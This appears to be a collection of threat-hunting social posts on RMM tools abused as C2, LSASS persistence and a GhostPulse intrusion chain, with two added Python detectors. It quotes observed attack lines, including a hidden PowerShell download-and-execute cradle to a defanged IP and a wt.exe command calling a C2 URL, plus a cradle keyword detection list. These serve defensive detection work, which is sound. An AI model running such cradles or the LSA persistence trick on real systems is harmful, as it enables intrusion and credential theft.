I wrote a book!
A Dance of Red and Blue - the epistemology, game theory, and craft behind detection engineering.
Giving away copies. Reply with your best cybersec joke or meme and I'll pick some folks to send it to.
https://t.co/adLjKgt9Zb
https://t.co/n7l3oK0LV5
Komari just landed in LOLRMM and this one's different. Komari doesn't need to be abused to function as a C2. The control channel ships enabled by default. You point it at a server you control and type an install command. That's it.
@HuntressLabs caught it being dropped as a SYSTEM-level backdoor, disguised as "Windows Update Service", pulled straight from GitHub.
The line between "self-hosted monitoring" and "self-hosted C2" doesn't exist here. That's exactly why it belongs in the catalog.
Thanks @KoifSec for the contribution. 🫡
🔗 https://t.co/F800eBlKwO
🧩 https://t.co/znXERe8Zqn
📖 https://t.co/UkuxqWsqAl
Published a new post right now on DetectFYI:
"The Life-Dinner Principle in Detection", continuing from the latest post about arms race dynamics. Enjoy!
https://t.co/5Od0aPQ5NG
Found a TP today from the Axios incident. The observed command was:
C:\ProgramData\wt.exe -w hidden -ep bypass -file C:\Users\xxx\AppData\Local\Temp\6202033.ps1 http://sfrclak.[com]:8000
wt.exe running from unusual directories. Thanks to @HuntressLabs for their research on this.
Today I’m launching Threat Hunting Labs.
Over the years I’ve analyzed many real-world intrusions. One thing became obvious: most training platforms don’t resemble how investigations actually happen.
So I built something different.
Threat Hunting Labs focuses on investigation-driven learning using real telemetry and structured investigative paths.
If you want to get better at investigating breaches, you should practice investigating breaches.
More details here:
https://t.co/cAuuh7sTJN
@Kostastsale I had the pleasure of beta testing this, highly recommended if this is something you're interested in. Everything Kostas does is worth looking into!
If you're dealing with code packages or supply-chain risks, just open-sourced one of my tools - https://t.co/ZyMUJz97L6 - completely usable from the CLI as well. Enjoy!
LSASS DLL loading can be abused to establish persistence inside a highly privileged system process. This registry modification alters the Notification Packages value under the LSA key, causing LSASS to load additional packages at startup.
Any unexpected LSA Notification Packages entry should be treated as suspicious.
https://t.co/Bz0BmucfvY
@three_cube @_aircorridor @DI0256
#redteam #DFIR #blueteam #pentest
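A worked check for the point above, added here as an example and not code from the original post: it parses the LSA "Notification Packages" value out of a `reg export` dump (hex(7), i.e. REG_MULTI_SZ encoded as comma-separated UTF-16LE bytes with backslash line continuations) and flags any package not in a baseline. The sample .reg text, the "evil" entry and the baseline of just "scecli" are constructed assumptions; build the baseline for each role from a golden image rather than trusting the one here.

```python
# Added example (not from the original post): decode the LSA "Notification Packages"
# REG_MULTI_SZ value from a `reg export` dump and flag entries outside a baseline.
import re

# Constructed sample in the shape `reg export "HKLM\SYSTEM\CurrentControlSet\Control\Lsa"`
# produces, trimmed to the value of interest. hex(7) = REG_MULTI_SZ: UTF-16LE strings,
# each NUL-terminated, the whole list ending in an extra NUL. The "evil" entry is made up.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Notification Packages"=hex(7):73,00,63,00,65,00,63,00,6c,00,69,00,00,00,65,\
  00,76,00,69,00,6c,00,00,00,00,00
'''

LSA_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
LSA_VALUE = "Notification Packages"

# Assumed baseline: a stock client install carries only "scecli" here. Domain
# controllers and hosts with password filters legitimately add more, so export
# this value from a known-good image of each role and put that list here instead.
BASELINE = {"scecli"}


def read_multi_sz(reg_text: str, key: str, value_name: str):
    """Return the list of strings in a hex(7) value under `key`, or None if absent."""
    # reg export wraps long hex values with a trailing backslash and indents the rest.
    joined = re.sub(r"\\\r?\n[ \t]*", "", reg_text)
    section = None
    for line in joined.splitlines():
        line = line.strip()
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            section = m.group(1).lower()
            continue
        if section != key.lower():
            continue
        m = re.match(r'^"([^"]+)"=hex\(7\):(.*)$', line)
        if m and m.group(1).lower() == value_name.lower():
            raw = bytes(int(b, 16) for b in m.group(2).split(",") if b.strip())
            # Split on the per-string NUL; the final double NUL yields empties we drop.
            return [s for s in raw.decode("utf-16-le").split("\x00") if s]
    return None


def _norm(name: str) -> str:
    # LSASS appends .dll itself and loads from System32, so compare bare names.
    return name.lower().removesuffix(".dll")


def unexpected_packages(packages, baseline=BASELINE):
    """Entries not in the baseline; anything returned deserves a look at System32\\<name>.dll."""
    allowed = {_norm(b) for b in baseline}
    return [p for p in packages if _norm(p) not in allowed]


if __name__ == "__main__":
    pkgs = read_multi_sz(SAMPLE_REG, LSA_KEY, LSA_VALUE)
    print("Notification Packages:", pkgs)
    print("unexpected:", unexpected_packages(pkgs))
```

On a live host the same check is `reg export "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" lsa.reg` followed by this parser, or simply Get-ItemProperty on that key; the value of parsing the export is that it works on offline hives and on collections pulled from many machines at once.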
We invited the first 150 users who signed up for early access. All invitees receive free credits to go through the investigations we currently have in beta. Great feedback so far!🙏
We will invite the second wave early next week! Thank you to everyone who is providing feedback!
Introducing the "Adversarial Detection Engineering (ADE) Framework" !
Developed by myself and Nikolas Bielski, ADE aims to be for detection rules what MITRE is for attack techniques and CWE is for code.
https://t.co/crbFpvoKmD
https://t.co/IkfCzc37Bs
I came across a GhostPulse/HijackLoader intrusion via ClickFix with some interesting evasion techniques.
Starts with a PowerShell cradle (178.17.59\.26:5506) deploying an MSI dropper. The GhostPulse loader (81f9a196...) has 0 detections on VT despite being a known binary — still figuring out how it was weaponized: https://t.co/NttLBMpSgb
PlaneV128.exe registers a keylogger (RegisterRawInputDevices), injects into Chrome/Edge via SetThreadContext, and launches browsers in headless mode for credential harvesting. Hardware breakpoints set for anti-debugging.
PlaneV128.exe dropped sup.msi (164MB) which extracted the superintendent application during its update routine. 172MB exfil to 84.21.173.142:80 over ~18 min. Persistence via Run key (HyperPackQuickCoreator → C:\Users\<user>\AppData\Local\MegaMaxion\superintendent.exe). The superintendent.exe binary appears to be legitimate software, currently investigating for possible DLL side-loading…
explorer.exe
└─ powershell.exe -nop -w hidden
   └─ msiexec.exe s1161271080.msi
      └─ S_Circuitr.exe
         └─ PlaneV128.exe (GhostPulse)
            ├─ chrome.exe --headless
            ├─ msedge.exe --headless
            └─ msiexec.exe sup.msi
               └─ superintendent.exe
Signed executables using ZONER/Crisp IM certificates observed throughout the chain.
Links:
• https://t.co/gfpION5bcZ
• https://t.co/cHZ4JThw1W
• https://t.co/SME0uLFhKi
Hunt for PowerShell cradles paired with --headless browser launches.
What's particularly interesting: Multiple components have zero detection. If you've seen similar intrusions or have insights on superintendent.exe/this chain, please comment below or reach out.
cc @malwrhunterteam
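The two hunts suggested in this thread and in the earlier Axios post, written out as an added example that is not the author's code: over constructed Sysmon-style process-creation events it (1) walks the parent chain of every headless Chrome/Edge launch looking for a PowerShell download cradle, and (2) flags known binaries such as wt.exe running from a directory they are not expected in. PIDs, paths, the cradle command line, the benign cmd.exe/chrome noise, the cradle-marker list and the expected-directory table are all assumptions; the tree shape mirrors the one above.

```python
# Added example, not code from the original thread: two hunts over constructed,
# Sysmon-style process-creation events. (1) headless Chrome/Edge launches whose
# ancestry contains a PowerShell download cradle; (2) known binaries running from
# directories they are not expected in. PIDs, paths and command lines are made up
# to mirror the thread's process tree; indicators are kept defanged as in the posts.
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


# Constructed sample events modelled on the tree in the thread, plus benign noise.
EVENTS = [
    ProcEvent(1000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2000, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -nop -w hidden -c "iwr http://178.17.59[.]26:5506/x | iex"'),
    ProcEvent(2100, 2000, r"C:\Windows\System32\msiexec.exe", "msiexec.exe s1161271080.msi"),
    ProcEvent(2200, 2100, r"C:\Users\u\AppData\Local\Temp\S_Circuitr.exe", "S_Circuitr.exe"),
    ProcEvent(2300, 2200, r"C:\Users\u\AppData\Local\Temp\PlaneV128.exe", "PlaneV128.exe"),
    ProcEvent(2400, 2300, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              "chrome.exe --headless"),
    ProcEvent(2500, 2300, r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
              "msedge.exe --headless"),
    # Benign: a developer running headless Chrome from a plain cmd.exe, no cradle above it.
    ProcEvent(3000, 1000, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(3100, 3000, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              "chrome.exe --headless --dump-dom https://example.com"),
    # The wt.exe observation from the Axios post, reproduced with its defanged domain.
    ProcEvent(4000, 1000, r"C:\ProgramData\wt.exe",
              r"C:\ProgramData\wt.exe -w hidden -ep bypass -file "
              r"C:\Users\xxx\AppData\Local\Temp\6202033.ps1 http://sfrclak.[com]:8000"),
]

BROWSERS = {"chrome.exe", "msedge.exe"}
# Two or more of these in one PowerShell command line is treated as a cradle (assumed threshold).
CRADLE_MARKERS = ("-w hidden", "-nop", "-ep bypass", "iex", "iwr", "invoke-webrequest",
                  "downloadstring", "downloadfile")
# Assumed legitimate path fragments per binary name (lower-case); extend from your baseline.
# Windows Terminal lives under a WindowsApps directory, either the Store package or the alias.
EXPECTED_DIRS = {
    "wt.exe": ("\\windowsapps\\",),
    "powershell.exe": ("\\windows\\system32\\windowspowershell\\",
                       "\\windows\\syswow64\\windowspowershell\\"),
}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_cradle(ev: ProcEvent) -> bool:
    if basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return False
    cl = ev.cmdline.lower()
    return sum(marker in cl for marker in CRADLE_MARKERS) >= 2


def ancestors(ev, by_pid, max_depth=8):
    """Walk parent links upward, stopping at the depth limit or on a PID cycle (reused PIDs)."""
    seen, cur = set(), by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen and len(seen) < max_depth:
        seen.add(cur.pid)
        yield cur
        cur = by_pid.get(cur.ppid)


def hunt_headless_from_cradle(events):
    """Return (browser_pid, cradle_pid) for every headless browser launched under a cradle."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if basename(ev.image) in BROWSERS and "--headless" in ev.cmdline.lower():
            for anc in ancestors(ev, by_pid):
                if is_cradle(anc):
                    hits.append((ev.pid, anc.pid))
                    break
    return hits


def hunt_unusual_directory(events):
    """Return PIDs of known binaries whose image path matches none of its expected fragments."""
    hits = []
    for ev in events:
        expected = EXPECTED_DIRS.get(basename(ev.image))
        if expected and not any(frag in ev.image.lower() for frag in expected):
            hits.append(ev.pid)
    return hits


if __name__ == "__main__":
    print("headless browser under cradle:", hunt_headless_from_cradle(EVENTS))
    print("known binary in unusual directory:", hunt_unusual_directory(EVENTS))
```

The ancestry walk is the part worth keeping: the headless launch in this chain is four processes below the cradle, so a parent-only rule never sees it, while the benign cmd.exe/chrome pair shows why the rule keys on a cradle ancestor rather than on `--headless` alone. Tune the marker threshold and the expected-directory table against your own telemetry before deploying.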
#GoreloRMM being pushed via a suspected email phishing campaign where the URL leads the user to a site with a "Download Proposal" button. This downloads a raw Gorelo installer.
Same lure/tactic used as another campaign at the beginning of the month that pushed #ImmyBot.
VT next